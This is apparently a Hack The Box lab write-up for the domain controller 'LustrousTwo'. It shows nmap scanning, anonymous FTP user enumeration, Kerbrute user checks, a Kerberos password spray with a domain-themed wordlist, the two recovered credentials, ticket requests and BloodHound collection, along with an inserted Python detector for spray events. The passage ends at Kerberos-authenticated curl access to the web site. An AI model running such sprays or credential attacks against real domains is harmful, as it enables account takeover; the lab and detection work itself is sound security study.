LustrousTwo

Pasted image 20250930204807.png

1. User

1.1. Recon

1.1.1. PortScan

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# nmap 10.129.193.58 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 00:18 EDT
Nmap scan report for 10.129.193.58
Host is up (0.12s latency).
Not shown: 65511 filtered tcp ports (no-response)
PORT      STATE SERVICE
21/tcp    open  ftp
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49669/tcp open  unknown
52398/tcp open  unknown
52416/tcp open  unknown
52426/tcp open  unknown
62896/tcp open  unknown
62897/tcp open  unknown
64635/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 33.39 seconds
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# nmap 10.129.193.58 -p 21,53,80,88,135,139,389,445,464,593,636,3268,3269,3389,598 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 00:22 EDT
Nmap scan report for 10.129.193.58
Host is up (0.097s latency).

PORT     STATE    SERVICE        VERSION
21/tcp   open     ftp            Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 09-06-24  05:20AM       <DIR>          Development
| 04-14-25  04:44AM       <DIR>          Homes
| 08-31-24  01:57AM       <DIR>          HR
| 08-31-24  01:57AM       <DIR>          IT
| 04-14-25  04:44AM       <DIR>          ITSEC
| 08-31-24  01:58AM       <DIR>          Production
|_08-31-24  01:58AM       <DIR>          SEC
| ftp-syst:
|_  SYST: Windows_NT
53/tcp   open     domain         Simple DNS Plus
80/tcp   open     http           Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Negotiate
88/tcp   open     kerberos-sec   Microsoft Windows Kerberos (server time: 2025-10-01 04:22:44Z)
135/tcp  open     msrpc          Microsoft Windows RPC
139/tcp  open     netbios-ssn    Microsoft Windows netbios-ssn
389/tcp  open     ldap           Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=LUS2DC.Lustrous2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:LUS2DC.Lustrous2.vl
| Not valid before: 2025-09-29T14:23:23
|_Not valid after:  2026-09-29T14:23:23
445/tcp  open     microsoft-ds?
464/tcp  open     kpasswd5?
593/tcp  open     ncacn_http     Microsoft Windows RPC over HTTP 1.0
598/tcp  filtered sco-websrvrmg3
636/tcp  open     ssl/ldap       Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=LUS2DC.Lustrous2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:LUS2DC.Lustrous2.vl
| Not valid before: 2025-09-29T14:23:23
|_Not valid after:  2026-09-29T14:23:23
3268/tcp open     ldap           Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=LUS2DC.Lustrous2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:LUS2DC.Lustrous2.vl
| Not valid before: 2025-09-29T14:23:23
|_Not valid after:  2026-09-29T14:23:23
|_ssl-date: TLS randomness does not represent time
3269/tcp open     ssl/ldap       Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=LUS2DC.Lustrous2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:LUS2DC.Lustrous2.vl
| Not valid before: 2025-09-29T14:23:23
|_Not valid after:  2026-09-29T14:23:23
|_ssl-date: TLS randomness does not represent time
3389/tcp open     ms-wbt-server  Microsoft Terminal Services
| ssl-cert: Subject: commonName=LUS2DC.Lustrous2.vl
| Not valid before: 2025-09-28T14:32:31
|_Not valid after:  2026-03-30T14:32:31
|_ssl-date: 2025-10-01T04:24:05+00:00; +2s from scanner time.
Service Info: Host: LUS2DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-10-01T04:23:25
|_  start_date: N/A
|_clock-skew: mean: 1s, deviation: 0s, median: 1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.49 seconds

1.1.2. Domain

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# nxc smb 10.129.193.58
SMB         10.129.193.58  445    LUS2DC           [*]  x64 (name:LUS2DC) (domain:Lustrous2.vl) (signing:True) (SMBv1:False) (NTLM:False)

1.1.3. ftp

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# ftp 10.129.193.58
Connected to 10.129.193.58.
220 Microsoft FTP Service
Name (10.129.193.58:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||55347|)
125 Data connection already open; Transfer starting.
09-06-24  05:20AM       <DIR>          Development
04-14-25  04:44AM       <DIR>          Homes
08-31-24  01:57AM       <DIR>          HR
08-31-24  01:57AM       <DIR>          IT
04-14-25  04:44AM       <DIR>          ITSEC
08-31-24  01:58AM       <DIR>          Production
08-31-24  01:58AM       <DIR>          SEC

There is something inside ITSEC:

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# cat audit_draft.txt
Audit Report Issue Tracking

[Fixed] NTLM Authentication Allowed
[Fixed] Signing & Channel Binding Not Enabled
[Fixed] Kerberoastable Accounts
[Fixed] SeImpersonate Enabled

[Open] Weak User Passwords

This tells us that users have weak passwords.

The Homes directory contains the names of many users:

ftp> ls
229 Entering Extended Passive Mode (|||55391|)
125 Data connection already open; Transfer starting.
09-07-24  12:03AM       <DIR>          Aaron.Norman
09-07-24  12:03AM       <DIR>          Adam.Barnes
09-07-24  12:03AM       <DIR>          Amber.Ward
09-07-24  12:03AM       <DIR>          Andrea.Smith
09-07-24  12:03AM       <DIR>          Ann.Lynch
09-07-24  12:03AM       <DIR>          Callum.Oliver
09-07-24  12:03AM       <DIR>          Carly.Walker
09-07-24  12:03AM       <DIR>          Chelsea.Smith
09-07-24  12:03AM       <DIR>          Chloe.Hammond
09-07-24  12:03AM       <DIR>          Christopher.Lawson
09-07-24  12:03AM       <DIR>          Claire.Parry
09-07-24  12:03AM       <DIR>          Darren.Lewis
09-07-24  12:03AM       <DIR>          Deborah.Jones
09-07-24  12:03AM       <DIR>          Dominic.West
09-07-24  12:03AM       <DIR>          Duncan.Smith
09-07-24  12:03AM       <DIR>          Elaine.Gallagher
09-07-24  12:03AM       <DIR>          Eleanor.Gregory
09-07-24  12:03AM       <DIR>          Emma.Bell
09-07-24  12:03AM       <DIR>          Francesca.Norman
09-07-24  12:03AM       <DIR>          Gary.Richards
09-07-24  12:03AM       <DIR>          Gerard.Ward
09-07-24  12:03AM       <DIR>          Glenn.Williams
09-07-24  12:03AM       <DIR>          Graeme.Pritchard
09-07-24  12:03AM       <DIR>          Harriet.Richardson
09-07-24  12:03AM       <DIR>          Henry.Connor
09-07-24  12:03AM       <DIR>          Howard.Robinson
09-07-24  12:03AM       <DIR>          Jacqueline.Phillips
09-07-24  12:03AM       <DIR>          Janice.Collier
09-07-24  12:03AM       <DIR>          Jasmine.Johnson
09-07-24  12:03AM       <DIR>          Joan.Wall
09-07-24  12:03AM       <DIR>          Judith.Francis
09-07-24  12:03AM       <DIR>          Justin.Williams
09-07-24  12:03AM       <DIR>          Kyle.Hussain
09-07-24  12:03AM       <DIR>          Kyle.Lloyd
09-07-24  12:03AM       <DIR>          Lawrence.Bryan
09-07-24  12:03AM       <DIR>          Leah.Elliott
09-07-24  12:03AM       <DIR>          Lewis.Khan
09-07-24  12:03AM       <DIR>          Liam.Wheeler
09-07-24  12:03AM       <DIR>          Lisa.Begum
09-07-24  12:03AM       <DIR>          Louis.Phillips
09-07-24  12:03AM       <DIR>          Lydia.Parker
09-07-24  12:03AM       <DIR>          Malcolm.Yates
09-07-24  12:03AM       <DIR>          Marie.Hill
09-07-24  12:03AM       <DIR>          Martin.Hamilton
09-07-24  12:03AM       <DIR>          Mathew.Roberts
09-07-24  12:03AM       <DIR>          Melissa.Thompson
09-07-24  12:03AM       <DIR>          Nathan.Carter
09-07-24  12:03AM       <DIR>          Nicola.Clarke
09-07-24  12:03AM       <DIR>          Nicola.Hall
09-07-24  12:03AM       <DIR>          Nigel.Lee
09-07-24  12:03AM       <DIR>          Pamela.Taylor
09-07-24  12:03AM       <DIR>          Robert.Russell
09-07-24  12:03AM       <DIR>          Ryan.Davies
09-07-24  12:03AM       <DIR>          Ryan.Moore
09-07-24  12:03AM       <DIR>          Ryan.Rowe
09-07-24  12:03AM       <DIR>          Samantha.Smith
09-07-24  12:03AM       <DIR>          Sara.Matthews
09-07-24  12:03AM       <DIR>          ShareSvc
09-07-24  12:03AM       <DIR>          Sharon.Birch
09-07-24  12:03AM       <DIR>          Sharon.Evans
09-07-24  12:03AM       <DIR>          Stacey.Barber
09-07-24  12:03AM       <DIR>          Stacey.Griffiths
09-07-24  12:03AM       <DIR>          Stephanie.Baxter
09-07-24  12:03AM       <DIR>          Stephanie.Davies
09-07-24  12:03AM       <DIR>          Steven.Sutton
09-07-24  12:03AM       <DIR>          Susan.Johnson
09-07-24  12:03AM       <DIR>          Terence.Jordan
09-07-24  12:03AM       <DIR>          Thomas.Myers
09-07-24  12:03AM       <DIR>          Tony.Davies
09-07-24  12:03AM       <DIR>          Victoria.Williams
09-07-24  12:03AM       <DIR>          Wayne.Taylor
226 Transfer complete

70 user names can be collected here.

Use Kerbrute to enumerate which of them are valid:

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# kerbrute userenum   --dc LUS2DC.Lustrous2.vl -d  Lustrous2.vl users

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 10/01/25 - Ronnie Flathers @ropnop

2025/10/01 03:56:21 >  Using KDC(s):
2025/10/01 03:56:21 >   LUS2DC.Lustrous2.vl:88

2025/10/01 03:56:21 >  [+] VALID USERNAME:       Callum.Oliver@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Ann.Lynch@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Aaron.Norman@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Amber.Ward@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Carly.Walker@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Adam.Barnes@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Andrea.Smith@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Chelsea.Smith@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Chloe.Hammond@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Christopher.Lawson@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Darren.Lewis@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Dominic.West@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Duncan.Smith@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Claire.Parry@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Elaine.Gallagher@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Deborah.Jones@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Gary.Richards@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Emma.Bell@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Francesca.Norman@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Eleanor.Gregory@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Henry.Connor@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Harriet.Richardson@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Glenn.Williams@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Graeme.Pritchard@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Gerard.Ward@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Howard.Robinson@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Janice.Collier@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Jasmine.Johnson@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Joan.Wall@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Kyle.Lloyd@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Kyle.Hussain@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Judith.Francis@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Justin.Williams@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Lawrence.Bryan@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Liam.Wheeler@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Leah.Elliott@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Lewis.Khan@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Lisa.Begum@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Louis.Phillips@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Marie.Hill@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Martin.Hamilton@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Malcolm.Yates@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Lydia.Parker@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Melissa.Thompson@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Mathew.Roberts@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Nicola.Clarke@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Nicola.Hall@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Nathan.Carter@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Nigel.Lee@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Ryan.Davies@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Pamela.Taylor@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Ryan.Moore@Lustrous2.vl
2025/10/01 03:56:21 >  [+] VALID USERNAME:       Robert.Russell@Lustrous2.vl
2025/10/01 03:56:22 >  [+] VALID USERNAME:       Ryan.Rowe@Lustrous2.vl
2025/10/01 03:56:22 >  [+] VALID USERNAME:       Samantha.Smith@Lustrous2.vl
2025/10/01 03:56:22 >  [+] VALID USERNAME:       ShareSvc@Lustrous2.vl
2025/10/01 03:56:22 >  [+] VALID USERNAME:       Sara.Matthews@Lustrous2.vl
2025/10/01 03:56:22 >  [+] VALID USERNAME:       Sharon.Birch@Lustrous2.vl
2025/10/01 03:56:22 >  [+] VALID USERNAME:       Stephanie.Baxter@Lustrous2.vl
2025/10/01 03:56:22 >  [+] VALID USERNAME:       Stacey.Griffiths@Lustrous2.vl
2025/10/01 03:56:22 >  [+] VALID USERNAME:       Stacey.Barber@Lustrous2.vl
2025/10/01 03:56:22 >  [+] VALID USERNAME:       Sharon.Evans@Lustrous2.vl
2025/10/01 03:56:22 >  [+] VALID USERNAME:       Stephanie.Davies@Lustrous2.vl
2025/10/01 03:56:22 >  [+] VALID USERNAME:       Steven.Sutton@Lustrous2.vl
2025/10/01 03:56:22 >  [+] VALID USERNAME:       Susan.Johnson@Lustrous2.vl
2025/10/01 03:56:22 >  [+] VALID USERNAME:       Thomas.Myers@Lustrous2.vl
2025/10/01 03:56:22 >  [+] VALID USERNAME:       Terence.Jordan@Lustrous2.vl
2025/10/01 03:56:22 >  [+] VALID USERNAME:       Tony.Davies@Lustrous2.vl
2025/10/01 03:56:22 >  [+] VALID USERNAME:       Wayne.Taylor@Lustrous2.vl
2025/10/01 03:56:22 >  [+] VALID USERNAME:       Victoria.Williams@Lustrous2.vl
2025/10/01 03:56:22 >  Done! Tested 71 usernames (70 valid) in 0.613 seconds

All of them are valid users.

The password should then be a very common one; otherwise this spray would take far too long.

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# while IFS= read -r password; do kerbrute passwordspray --dc LUS2DC.Lustrous2.vl -d Lustrous2.vl users "$password"; done < /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-1000.txt |grep +

Sprayed 1000 passwords with no result at all.
I figured a custom, target-specific wordlist was needed.
So I simply had an AI generate 100 candidate passwords, since very little was known at this point: only the domain name, Lustrous2.
Pasted image 20251001183157.png

lustrous2
Lustrous2
LUSTROUS2
lustrous
Lustrous
LUSTROUS
lustrous123
Lustrous123
lustrous2023
Lustrous2023
lustrous2024
Lustrous2024
lustrous2025
Lustrous2025
lustrous21
Lustrous21
lustrous22
Lustrous22
lustrous!
Lustrous!
lustrous@
Lustrous@
lustrous#
Lustrous#
lustrous$
Lustrous$
lustrous%
Lustrous%
lustrous&
Lustrous&
lustrous*
Lustrous*
lustrous1
Lustrous1
lustrous12
Lustrous12
lustrous2!
Lustrous2!
lustrous2@
Lustrous2@
lustrous2#
Lustrous2#
lustrous01
Lustrous01
lustrous02
Lustrous02
lustrous99
Lustrous99
lustrous00
Lustrous00
lust2
Lust2
lust123
Lust123
lust2023
Lust2023
lust2024
Lust2024
lustrous_2
Lustrous_2
lustrous-2
Lustrous-2
lustrous.2
Lustrous.2
2lustrous
2Lustrous
2LUSTROUS
lustrous2!
Lustrous2!
lustrous2@
Lustrous2@
lustrous2#
Lustrous2#
lustrous2$
Lustrous2$
lustrous20
Lustrous20
lustrous19
Lustrous19
lustrous18
Lustrous18
lustrous17
Lustrous17
lustrous16
Lustrous16
lustrous15
Lustrous15
lustr0us2
Lustr0us2
l0str0us2
L0str0us2
lustru5
Lustru5
lustr0us
Lustr0us
lustrous321
Lustrous321
lustrous234
Lustrous234
lustrous345
Lustrous345
lustrous456
Lustrous456
lustrous789
Lustrous789
lustrous987
Lustrous987
lustrous666
Lustrous666
lustrous777
Lustrous777
lustrous888
Lustrous888
lustrous999
Lustrous999
lustrous111
Lustrous111
admin
admin123
administrator
password
password123
123456
12345678
qwerty
abc123
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# while IFS= read -r password; do kerbrute passwordspray --dc LUS2DC.Lustrous2.vl -d Lustrous2.vl users "$password"; done < passwords.txt |grep +
2025/10/01 06:29:52 >  [+] VALID LOGIN:  Thomas.Myers@Lustrous2.vl:Lustrous2024
2025/10/01 06:30:21 >  [+] VALID LOGIN:  Terence.Jordan@Lustrous2.vl:Lustrous2!
2025/10/01 06:30:58 >  [+] VALID LOGIN:  Terence.Jordan@Lustrous2.vl:Lustrous2!

Two sets of user credentials were obtained directly:

Thomas.Myers@Lustrous2.vl:Lustrous2024
Terence.Jordan@Lustrous2.vl:Lustrous2!
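From the defender's side, a Kerberos password spray like the one above leaves a distinctive trail on the domain controller: a single client address generates event 4771 (Kerberos pre-authentication failed) with failure code 0x18 (wrong password) against many different accounts within a short window, and then a 4768 (TGT issued) appears for whichever accounts the guessed password matched. The Python below is an added example, not part of the original writeup; it runs that detection logic over a constructed set of events. The event records, the workstation address 10.129.193.77 and the thresholds are assumptions made for the example; the account names and the 10.10.14.91 source address are taken from this page.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of DC Security-log events (not real log data from the box).
# 4771 = Kerberos pre-authentication failed; status 0x18 = KDC_ERR_PREAUTH_FAILED
#        (wrong password for an existing account)
# 4768 = TGT requested; status 0x0 = success
SPRAYER = "10.10.14.91"        # attacker VPN address seen elsewhere in this writeup
WORKSTATION = "10.129.193.77"  # assumed benign client, invented for the example
ACCOUNTS = [
    "Aaron.Norman", "Adam.Barnes", "Amber.Ward", "Andrea.Smith", "Ann.Lynch",
    "Callum.Oliver", "Carly.Walker", "Chelsea.Smith", "Chloe.Hammond",
    "Christopher.Lawson", "Claire.Parry", "Darren.Lewis",
]

def _event(t, event_id, account, client, status):
    return {"time": t.isoformat(), "id": event_id, "account": account,
            "client": client, "status": status}

def build_sample_events():
    t0 = datetime(2025, 10, 1, 6, 29, 50)
    events = []
    # one bad guess per account, one second apart: the spray pattern
    for i, account in enumerate(ACCOUNTS):
        events.append(_event(t0 + timedelta(seconds=i), 4771, account, SPRAYER, "0x18"))
    # the guess that worked: a TGT is issued to the same client
    events.append(_event(t0 + timedelta(seconds=13), 4768, "Thomas.Myers", SPRAYER, "0x0"))
    # benign noise: one user mistyping their own password three times
    for i in range(3):
        events.append(_event(t0 + timedelta(seconds=20 + i), 4771, "Nicola.Hall", WORKSTATION, "0x18"))
    return events

SAMPLE_EVENTS = build_sample_events()

def detect_spray(events, window=timedelta(minutes=5), min_accounts=10):
    """Return {client: sorted distinct accounts} for every client whose bad-password
    pre-auth failures touched at least `min_accounts` distinct accounts within `window`."""
    failures = defaultdict(list)
    for e in events:
        if e["id"] == 4771 and e["status"] == "0x18":
            failures[e["client"]].append((datetime.fromisoformat(e["time"]), e["account"]))
    alerts = {}
    for client, fails in failures.items():
        fails.sort()
        start = 0
        for end in range(len(fails)):
            # slide the window start forward until it spans at most `window`
            while fails[end][0] - fails[start][0] > window:
                start += 1
            if len({a for _, a in fails[start:end + 1]}) >= min_accounts:
                alerts[client] = sorted({a for _, a in fails})
                break
    return alerts

def successful_logons_from(events, alerts):
    """Accounts that received a TGT from a client already flagged as spraying:
    the ones whose password was actually guessed."""
    hits = {}
    for e in events:
        if e["id"] == 4768 and e["status"] == "0x0" and e["client"] in alerts:
            hits.setdefault(e["client"], []).append(e["account"])
    return hits

if __name__ == "__main__":
    found = detect_spray(SAMPLE_EVENTS)
    for client, accounts in found.items():
        print(f"[!] {client}: pre-auth failures against {len(accounts)} accounts")
    for client, accounts in successful_logons_from(SAMPLE_EVENTS, found).items():
        print(f"[!] {client}: TGT issued afterwards for {accounts}")
```

The window and account threshold are the knobs to tune against a real DC: a helpdesk subnet will produce a few accounts per source, a spray produces dozens, and the 4768 that follows from the same source is the event worth paging on.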
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# nxc smb LUS2DC.Lustrous2.vl -u Thomas.Myers -p Lustrous2024 -k
SMB         LUS2DC.Lustrous2.vl 445    LUS2DC           [*]  x64 (name:LUS2DC) (domain:Lustrous2.vl) (signing:True) (SMBv1:False) (NTLM:False)
SMB         LUS2DC.Lustrous2.vl 445    LUS2DC           [+] Lustrous2.vl\Thomas.Myers:Lustrous2024

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# nxc smb LUS2DC.Lustrous2.vl -u Terence.Jordan -p Lustrous2! -k
SMB         LUS2DC.Lustrous2.vl 445    LUS2DC           [*]  x64 (name:LUS2DC) (domain:Lustrous2.vl) (signing:True) (SMBv1:False) (NTLM:False)
SMB         LUS2DC.Lustrous2.vl 445    LUS2DC           [+] Lustrous2.vl\Terence.Jordan:Lustrous2!
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# impacket-getTGT Lustrous2.vl/Thomas.Myers:'Lustrous2024' -dc-ip 10.129.193.58
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in Thomas.Myers.ccache

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# impacket-getTGT Lustrous2.vl/Terence.Jordan:'Lustrous2!' -dc-ip 10.129.193.58
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in Terence.Jordan.ccache
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# bloodhound-ce-python -c All -u Thomas.Myers  -d Lustrous2.vl -ns 10.129.193.58 --zip  --ldap-channel-binding -k -no-pass
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: lustrous2.vl
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: lus2dc.lustrous2.vl
INFO: Testing resolved hostname connectivity dead:beef::688b:6562:1ae7:b471
INFO: Trying LDAP connection to dead:beef::688b:6562:1ae7:b471
INFO: Testing resolved hostname connectivity dead:beef::1a6
INFO: Trying LDAP connection to dead:beef::1a6
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 4 computers
INFO: Connecting to LDAP server: lus2dc.lustrous2.vl
INFO: Testing resolved hostname connectivity dead:beef::688b:6562:1ae7:b471
INFO: Trying LDAP connection to dead:beef::688b:6562:1ae7:b471
INFO: Testing resolved hostname connectivity dead:beef::1a6
INFO: Trying LDAP connection to dead:beef::1a6
INFO: Found 75 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer: LUS2DC.Lustrous2.vl
INFO: Done in 00M 14S
INFO: Compressing output into 20251001072816_bloodhound.zip

Pasted image 20251001193414.png
Nothing much: there is only one group the user can add to, and that group has no outbound object control.

Earlier I had found a web site but could never get into it. After reading 0xdf's writeup I learned that it requires Kerberos authentication.

First configure krb5.conf:

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# nxc smb LUS2DC.Lustrous2.vl --generate-krb5-file  /etc/krb5.conf 
SMB         10.129.193.58  445    LUS2DC           [*]  x64 (name:LUS2DC) (domain:Lustrous2.vl) (signing:True) (SMBv1:False) (NTLM:False)
                                                                            
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# cat /etc/krb5.conf                       

[libdefaults]
    dns_lookup_kdc = false
    dns_lookup_realm = false
    default_realm = LUSTROUS2.VL

[realms]
    LUSTROUS2.VL = {
        kdc = lus2dc.Lustrous2.vl
        admin_server = lus2dc.Lustrous2.vl
        default_domain = Lustrous2.vl
    }

[domain_realm]
    .Lustrous2.vl = LUSTROUS2.VL
    Lustrous2.vl = LUSTROUS2.VL

Then you can log in with kinit:

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# kinit thomas.myers
Password for thomas.myers@LUSTROUS2.VL:

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# klist
Ticket cache: FILE:Thomas.Myers.ccache
Default principal: thomas.myers@LUSTROUS2.VL

Valid starting       Expires              Service principal
10/01/2025 07:48:32  10/01/2025 17:48:32  krbtgt/LUSTROUS2.VL@LUSTROUS2.VL
        renew until 10/02/2025 07:48:23

1.4.1. curl with kerberos

The simplest way to verify that a site uses Kerberos authentication is curl with the --negotiate option.

  • --negotiate enables SPNEGO (Simple and Protected GSSAPI Negotiation Mechanism) authentication; curl then negotiates the best available method, usually choosing between Kerberos and NTLM.

    When the site uses Kerberos authentication, curl uses our TGT to request a service ticket for HTTP/lus2dc.lustrous2.vl, wraps it in a token and sends it in the Authorization header.

You first need to point the credential cache environment variable at the ticket:

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# export KRB5CCNAME=Thomas.Myers.ccache

Then request the site:

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# curl  http://lus2dc.lustrous2.vl --negotiate -I -u :
HTTP/1.1 200 OK
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
WWW-Authenticate: Negotiate oYG3MIG0oAMKAQChCwYJKoZIhvcSAQICooGfBIGcYIGZBgkqhkiG9xIBAgICAG+BiTCBhqADAgEFoQMCAQ+iejB4oAMCARKicQRv9tnHvYuO3z1EsFmcl3ZHwPolBurPoW2hIAjUo5z2Kii18H+7xze2l3lnoL8kCGCZbLRZXv2bRv3uaOCp1ZHCvoRjH7uOjOVR2e/VzVzVHVf62MxfJ/Ukitdg1RLiO8yqHLWytQJlr71ipE4ym5eZ
Persistent-Auth: true
X-Powered-By: ASP.NET
Date: Wed, 01 Oct 2025 11:57:47 GMT
  • -I returns only the response headers, since the status code is all we need.
  • -u : sets an empty user name and password, which tells curl to use system authentication, i.e. the Kerberos ticket.
